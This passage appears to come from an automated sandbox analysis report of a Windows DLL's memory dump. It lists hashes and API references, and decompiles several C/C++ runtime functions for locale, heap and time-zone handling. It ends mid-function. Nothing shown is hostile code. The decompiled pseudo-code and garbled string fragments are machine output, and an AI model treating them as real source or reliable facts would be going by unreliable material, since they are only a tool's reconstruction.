Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: #n
API String ID: 3033488037-925149467
Opcode ID: 4567b5213aa9eb15e185093ed2c42a6bbb16618d5fd08e52aa150ac634c8bbbc
Instruction ID: 20c82b030b8189ffe1d036cc3c03ed7ee8726b33421a92d4597d30def46bcee3
Opcode Fuzzy Hash: 4567b5213aa9eb15e185093ed2c42a6bbb16618d5fd08e52aa150ac634c8bbbc
Instruction Fuzzy Hash: A8510675A1030DAFDB50CFA9D841AAAB7FAEF45725F100969E809DB2D0E731E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E2023DD, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6E202409
__cftoe.LIBCMT ref: 6E20243B

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 6f4699ed3d103c1198122b4628ab5985dc297166496de1080d494b8553683d58
Instruction ID: a688100570c71f32e0c2eff8f943b1f216f983001335ed6e8de7adf0b9257da3
Opcode Fuzzy Hash: 6f4699ed3d103c1198122b4628ab5985dc297166496de1080d494b8553683d58
Instruction Fuzzy Hash: A751E6B790420EABDB548BE88C51E9E77BFEF49335F20461BE825A71C2EF30D5008664

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A18A0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1A18D5

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

ctype.LIBCPMT ref: 6E1A18E7

Part of subcall function 6E1A1928: __Getctype.LIBCPMT ref: 6E1A1937
Part of subcall function 6E1A1928: __Getcvt.LIBCPMT ref: 6E1A1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1A18F1

Part of subcall function 6E1A14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1A14F5
Part of subcall function 6E1A14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1566

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: fcc9801b552ea3fcd822320e0c001017b8c3f654c621d3af90d35771df46e8a0
Instruction ID: 288e5d56354dac17ebab70982f75deb1a1a5184dc4a147f8ca348240d6528b30
Opcode Fuzzy Hash: fcc9801b552ea3fcd822320e0c001017b8c3f654c621d3af90d35771df46e8a0
Instruction Fuzzy Hash: 34F03AB96006199FDB10DFE8C451BFDB7A9AF40765F20481DE3095B280DF745AC8EB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C8499, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 6E1C849F

Part of subcall function 6E1C7FAF: __EH_prolog3.LIBCMT ref: 6E1C7FB6
Part of subcall function 6E1C7FAF: std::locale::_Init.LIBCPMT ref: 6E1C7FFF

Part of subcall function 6E1C8BFE: __EH_prolog3.LIBCMT ref: 6E1C8C05

std::ios_base::_Addstd.LIBCPMT ref: 6E1C84D8

Part of subcall function 6E1A1EEA: __CxxThrowException@8.LIBVCRUNTIME ref: 6E1A1F4E

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Initstd::ios_base::_$AddstdException@8Throwstd::locale::_
String ID:
API String ID: 3866902965-0
Opcode ID: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction ID: 5a79e66212fc546b9cb539ce811d8ba1ae2f577815e9349859a8fbd598d3c658
Opcode Fuzzy Hash: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction Fuzzy Hash: A8F0E5302003146BE720DAE1C484B9BB7DCBF20B38F10480FE5828BA80C7B9F4809B92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C78D3, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1C78DA
std::locale::_Init.LIBCPMT ref: 6E1C78FB

Part of subcall function 6E1C7005: __EH_prolog3.LIBCMT ref: 6E1C700C
Part of subcall function 6E1C7005: std::_Lockit::_Lockit.LIBCPMT ref: 6E1C7017
Part of subcall function 6E1C7005: std::locale::_Setgloballocale.LIBCPMT ref: 6E1C7032
Part of subcall function 6E1C7005: _Yarn.LIBCPMT ref: 6E1C7048
Part of subcall function 6E1C7005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C7088

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 4e82cabdf547493b8d7938256dda408408391b5c8288b6efc24da6fccfdcb9e0
Instruction ID: ad2a6774963098cc4d8e9ef02b6b89a33c1ac7724ddaffea5f63548127e2b4bf
Opcode Fuzzy Hash: 4e82cabdf547493b8d7938256dda408408391b5c8288b6efc24da6fccfdcb9e0
Instruction Fuzzy Hash: AEE0DF32E21A255BD31297F48501BACA1666F94F24F62041AE101DFAC0DFE8888067C3

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D9CA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 6E20C7EF: HeapAlloc.KERNEL32(00000008,?,00000000,?,6E20D6B4,00000001,00000364,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9), ref: 6E20C830

_free.LIBCMT ref: 6E20D9EA

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction ID: f120fe607930b68b395d28ada65f3264b448796cb577e22a7b32f127e13f76ea
Opcode Fuzzy Hash: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction Fuzzy Hash: B5F03CB6A01609AFD310DFA9D441B9AB7F8FB48710F204566E918DB380E771A9108BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F26D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 78945eb8f71123853590ab6bd4011905647aad285bc9a2ca962dcd76377b9691
Instruction ID: db1c89c45e10d23e5b0023cc8a8724ac2bb0bc9fc8ac7d7920fc89b106feb930
Opcode Fuzzy Hash: 78945eb8f71123853590ab6bd4011905647aad285bc9a2ca962dcd76377b9691
Instruction Fuzzy Hash: C7E0302A18562A9FF75116E69814B8B3B9FAF837B2B2105119C35965C0CB20C801C1A8

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C8BFE, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1C8C05

Part of subcall function 6E1C4A80: __EH_prolog3.LIBCMT ref: 6E1C4A87
Part of subcall function 6E1C4A80: std::_Lockit::_Lockit.LIBCPMT ref: 6E1C4A91
Part of subcall function 6E1C4A80: int.LIBCPMT ref: 6E1C4AA8
Part of subcall function 6E1C4A80: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C4AF8

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1538362411-0
Opcode ID: de9717a7c200d9aea492356fc713f49e472a97ad2c513bcafff6721d11ef1cac
Instruction ID: 5b10f7d743c4652ad39e6a93ff41cf46ddd5faf3dda7cc33e8da45e1dd3273a2
Opcode Fuzzy Hash: de9717a7c200d9aea492356fc713f49e472a97ad2c513bcafff6721d11ef1cac
Instruction Fuzzy Hash: FDF0E579A011099FDF04EBE0C4049FDB73AFF50205F100008D901AB280DF759F46EBA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E21E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E21E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e28506c; // 0x3ec3ee36
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6e20e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E20D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E20D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e20e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e232f04; // 0x17
					E6E21E68F(0, " )#nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e20e03b
					E6E21E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e20e03b
						E6E21E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e20e03b
						E6E21E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e232dec; // 0x41
						_t77 = E6E21E68F(_t99, "t!#nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E21E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2145D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E1DF8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2145D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E225124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E21E112(_t92, _t99,  &_v20);
						} else {
							E6E21E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x6e21e6f4
0x6e21e6fb
0x6e21e702
0x6e21e702
0x6e21e706
0x6e21e70a
0x6e21e718
0x6e21e71d
0x6e21e71e
0x6e21e71f
0x6e21e720
0x6e21e725
0x6e21e728
0x6e21e72a
0x6e21e730
0x6e21e736
0x6e21e739
0x6e21e73b
0x6e21e73e
0x6e21e742
0x6e21e749
0x6e21e756
0x6e21e75b
0x6e21e75e
0x6e21e761
0x6e21e761
0x6e21e763
0x6e21e766
0x6e21e76a
0x6e21e7da
0x6e21e7dc
0x6e21e7de
0x6e21e7f1
0x6e21e7f1
0x6e21e7f8
0x6e21e7fe
0x6e21e801
0x00000000
0x6e21e801
0x6e21e7e0
0x6e21e7e3
0x00000000
0x00000000
0x6e21e7e5
0x6e21e7e9
0x6e21e7ee
0x00000000
0x6e21e771
0x6e21e771
0x6e21e775
0x6e21e787
0x6e21e78b
0x6e21e77c
0x6e21e77c
0x6e21e780
0x6e21e780
0x6e21e794
0x6e21e795
0x6e21e81f
0x6e21e81f
0x00000000
0x6e21e79b
0x6e21e79b
0x6e21e7aa
0x6e21e7af
0x6e21e7b4
0x6e21e804
0x6e21e804
0x6e21e804
0x6e21e806
0x6e21e80a
0x6e21e821
0x6e21e82d
0x6e21e837
0x6e21e83a
0x6e21e83b
0x6e21e83d
0x00000000
0x00000000
0x6e21e83f
0x6e21e845
0x00000000
0x00000000
0x6e21e847
0x6e21e84d
0x00000000
0x00000000
0x6e21e853
0x6e21e859
0x6e21e85b
0x00000000
0x00000000
0x6e21e862
0x6e21e868
0x6e21e86a
0x00000000
0x00000000
0x6e21e86c
0x6e21e86f
0x6e21e871
0x6e21e873
0x6e21e873
0x6e21e884
0x6e21e889
0x6e21e88b
0x6e21e8eb
0x6e21e80e
0x6e21e81e
0x6e21e81e
0x6e21e89a
0x6e21e8aa
0x6e21e8b0
0x6e21e8b2
0x00000000
0x00000000
0x6e21e8c9
0x6e21e8cf
0x6e21e8d1
0x00000000
0x00000000
0x6e21e8e3
0x00000000
0x6e21e8e8
0x6e21e80c
0x00000000
0x6e21e80c
0x6e21e7b6
0x6e21e7b8
0x6e21e7bc
0x6e21e7d2
0x6e21e7c3
0x6e21e7c7
0x6e21e7c7
0x6e21e7d7
0x00000000
0x6e21e7d7
0x6e21e795

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D65E
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E21E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6E21E853
IsValidLocale.KERNEL32(?,00000001), ref: 6E21E862
GetLocaleInfoW.KERNEL32(?,00001001,; n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E21E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E21E8C9

Strings

)#nU, xrefs: 6E21E751
; n, xrefs: 6E21E702, 6E21E8A1
; n, xrefs: 6E21E715, 6E21E725, 6E21E7E5, 6E21E787, 6E21E77C, 6E21E77F, 6E21E78A, 6E21E7E8
; n, xrefs: 6E21E7CE, 6E21E7C3, 6E21E821
t!#nE, xrefs: 6E21E7A5

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )#nU$; n$; n$; n$t!#nE
API String ID: 745075371-3664795132
Opcode ID: 7918e64115b843f4d7288de4cca1cc8592f7c53be77f0bfec296359a968c75d6
Instruction ID: 677d63c20cf54e1ffeb371a4d9de909f5c362a466d7101c1f585acfbdf4452df
Opcode Fuzzy Hash: 7918e64115b843f4d7288de4cca1cc8592f7c53be77f0bfec296359a968c75d6
Instruction Fuzzy Hash: DD517B7290420FAFEB50DFE5CC44AEA77FAAF05701F154529EA20EB590E7709A418B61

Uniqueness

Uniqueness Score: -1.00%

Function 6E21877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E21877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E21822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E218289( &_v8) != 0 || E6E218231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E21822B();
					_t32 =  &_v52; // 0x6e232130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E218289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E202188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e28506c; // 0x3ec3ee36
						_v100 = _t74 ^ _t192;
						 *0x6e285384 =  *0x6e285384 | 0xffffffff;
						 *0x6e285378 =  *0x6e285378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e287a10 = 0;
						_t78 = E6E211216(0x6e232130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e232130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E20F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E211216(0x6e232130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e232130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E20CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E20CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E21877C(0x6e232130, _t172, __eflags);
							}
						}
						E6E20CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E1DF8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E218231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E21825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E20CBD3( *0x6e287a08);
								 *0x6e287a08 = 0;
								 *_t194 = 0x6e287a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e287a18 * 0x3c;
									_t168 =  *0x6e287a6c; // 0x0
									_push(_t171);
									 *0x6e287a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e287a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e287ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e287ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E203CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e287a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e287a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E218225()) = _v12;
								 *((intOrPtr*)(E6E218219())) = _v16;
								_t96 = E6E21821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e287a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E20CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e218b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e218b6e
						 *0x6e287a08 = E6E20F26D(_t154 - _t170, _t13);
						_t116 = E6E20CBD3(0);
						_t167 =  *0x6e287a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e218b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e218b6e
							_t119 = E6E20AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E223B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E20BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
